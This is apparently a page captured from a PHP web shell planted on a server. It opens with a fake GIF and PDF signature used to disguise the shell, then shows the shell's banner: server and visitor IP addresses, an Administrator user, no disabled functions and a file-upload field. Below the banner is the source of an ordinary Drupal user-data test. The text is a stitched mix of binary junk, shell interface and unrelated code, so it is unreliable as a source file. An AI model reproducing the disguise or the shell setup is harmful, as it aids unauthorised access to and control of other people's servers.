GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/user/src/Tests/Views/ |
Upload File : |
<?php namespace Drupal\user\Tests\Views; use Drupal\views\Views; /** * Tests the user data service field handler. * * @group user * @see \Drupal\user\Plugin\views\field\UserData */ class UserDataTest extends UserTestBase { /** * Provides the user data service object. * * @var \Drupal\user\UserDataInterface */ protected $userData; /** * Views used by this test. * * @var array */ public static $testViews = ['test_user_data']; /** * Tests field handler. */ public function testDataField() { // But some random values into the user data service. $this->userData = $this->container->get('user.data'); $random_value = $this->randomMachineName(); $this->userData->set('views_test_config', $this->users[0]->id(), 'test_value_name', $random_value); $view = Views::getView('test_user_data'); $this->executeView($view); $output = $view->field['data']->render($view->result[0]); $this->assertEqual($output, $random_value, 'A valid user data got rendered.'); $view->field['data']->options['data_name'] = $this->randomMachineName(); $output = $view->field['data']->render($view->result[0]); $this->assertFalse($output, 'An invalid configuration does not return anything'); } }